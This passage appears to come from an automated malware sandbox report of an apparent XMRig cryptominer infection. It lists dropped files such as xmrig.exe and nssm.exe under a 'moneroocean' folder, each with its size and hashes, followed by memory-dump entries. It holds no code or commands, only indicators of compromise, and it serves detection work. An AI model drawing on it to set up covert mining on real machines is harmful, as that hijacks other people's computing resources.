                                                                                                                                                                                                                                                                de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                360KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                1136efb1a46d1f2d508162387f30dc4d

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                f280858dcfefabc1a9a006a57f6b266a5d1fde8e

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\xmrig.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2.9MB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                9ebff8f90ff91a96a0a9095197811862

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                86962329deaa930b3b3db56b8a7dbabdd06c0b10

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                7b4abb9ebe93e76016b84b0ab5768fa48ffad823e0643fa846d11f1c6b25c421

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                1f62d5d43addd1799e3683c298dafb9f1e65573f8424804ef118e5816a79b411bbb2da2de6efb874823d9f7bdbacd9692daba4ae693860a650e9c7d7998f4f5c

                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\xmrig.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                3.2MB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                1fecd1e1da734c8beddad4c25ef97111

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                75f4360976c4559593cdc5b4dc27ac55f7ac7b4a

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                ffbfafc19c3c948f6c8ed19ed88073da6621c24da3fcd687bcdf927c9e1cf8ae

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                ebedc96ba16434dd24523ffa4b88f2c24b67a0242db51401cdd4db0a029758625947d1dcb3dab677a7781bd81440d0bd6454cde8393a1a58537ef4a3aa25a79d

                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\xmrig.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                3.7MB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                dd533a008e6c60734c8ad8a8c9ffffe6

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                86faca74801b8aa125e2122fa83e17e523ed3776

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                d9566568962be7126de4f1d5757b988c54b741efb35a4d48008c2a6b8caec082

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                fa1e50efe9b2a09cadc2acb8e975253f00d75b3a1336120205556f10ede8aec3897b14f2f30a2d132a2071bb37c2bfe16f2be13fbc5995c91e0ceb8355172ed7

                                                                                                                                                                                                                                                              • C:\Users\Admin\nssm.zip
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                135KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                7ad31e7d91cc3e805dbc8f0615f713c1

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                9f3801749a0a68ca733f5250a994dea23271d5c3

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

                                                                                                                                                                                                                                                              • C:\Users\Admin\xmrig.zip
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                3.3MB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                f9caf02eba0daf9b1add2262024513d1

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                50766d2ca13216f12a47102edf85f1551bb5bbda

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                2c8358e24e9c85aaa558e55a02bb0f9c375706812a27d8702a296bb2a96e2e8e

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                469d8c2a941e106e86b93861fe19bfd87384b7796c2c3efc6cfd858792d2e59cde2a8966ca8d18149ee1121a89fa8ac45ee4e184093e06571021c0ed607a5e57

                                                                                                                                                                                                                                                              • memory/1420-199-0x00007FFE6DE93000-0x00007FFE6DE95000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                              • memory/1420-203-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                                                              • memory/1420-13-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                                                              • memory/1420-12-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                                                              • memory/1420-11-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                                                              • memory/1420-6-0x000001706CAA0000-0x000001706CAC2000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                                              • memory/1420-0-0x00007FFE6DE93000-0x00007FFE6DE95000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                              • memory/1420-200-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                                                              • memory/1688-204-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/1688-210-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/1688-215-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/1688-214-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/1688-213-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/1688-205-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/1688-206-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/1688-207-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/1688-208-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/1688-209-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/1688-212-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/1688-211-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/4516-66-0x0000000001230000-0x0000000001250000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                128KB

                                                                                                                                                                                                                                                              • memory/4516-67-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                              • memory/4776-40-0x0000020A6D180000-0x0000020A6D18A000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                              • memory/4776-41-0x0000020A6D2C0000-0x0000020A6D2D2000-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                72KB